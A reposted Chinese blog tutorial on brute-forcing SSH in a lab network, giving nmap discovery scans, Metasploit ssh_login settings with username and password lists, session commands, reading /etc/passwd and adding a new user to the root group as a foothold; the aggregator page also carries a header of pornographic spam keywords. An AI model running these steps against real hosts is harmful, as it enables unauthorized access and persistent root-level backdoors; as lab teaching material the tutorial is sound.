日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

内网渗透ssh爆破

發(fā)布時(shí)間:2025/6/15 编程问答 23 豆豆
生活随笔 收集整理的這篇文章主要介紹了 内网渗透ssh爆破 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

掃描局域網(wǎng)存活主機(jī)

注意:以下使用的ip地址為我部署的環(huán)境網(wǎng)段,如果你在看本文,請靈活的進(jìn)行學(xué)習(xí)以及使用。目標(biāo)主機(jī)=靶機(jī)

nmap -sP 192.168.1.0/24

掃描靶機(jī)的操作系統(tǒng)以及版本號

nmap -O 192.168.1.111

掃描靶機(jī)的應(yīng)用程序以及應(yīng)用程序的版本號

nmap -sV 192.168.1.111

利用msf ssh_login模塊暴力破解靶機(jī)ssh密碼

先打開MSF 進(jìn)入ssh_login模塊 show options查看提示

使用ssh_login模塊

use auxiliary/scanner/ssh/ssh_login

設(shè)定靶機(jī)IP

set RHOSTS 192.168.1.111

設(shè)置賬號文件/設(shè)置賬號

你可以設(shè)置賬號,但是只嘗試這一個(gè),建議你使用賬號文件

#設(shè)置賬號 set USERNAME root

#設(shè)置賬號文件 set USER_FILE 密碼文件

設(shè)置密碼文件/設(shè)置密碼

你可以設(shè)置密碼,但是只嘗試這一個(gè),建議你使用密碼文件

#設(shè)置密碼 set PASSWORD 123456

#設(shè)置密碼文件 set PASS_FILE 密碼文件

運(yùn)行

你既可以使用run也可以使用exploit

會(huì)話

查詢會(huì)話方面的信息

sessions -i

打開會(huì)話

#打開id為1的會(huì)話 輸入ifconfig查詢ip 成功 sessions -i 1

查看密碼文件

cat /etc/passwd

添加用戶設(shè)置密碼并添加到root組

useradd admin123 passwd admin123 usermod -g root admin123



作者:逍遙呀
鏈接:https://www.jianshu.com/p/c9598aa2f00e
來源:簡書
簡書著作權(quán)歸作者所有,任何形式的轉(zhuǎn)載都請聯(lián)系作者獲得授權(quán)并注明出處。

總結(jié)

以上是生活随笔為你收集整理的内网渗透ssh爆破的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。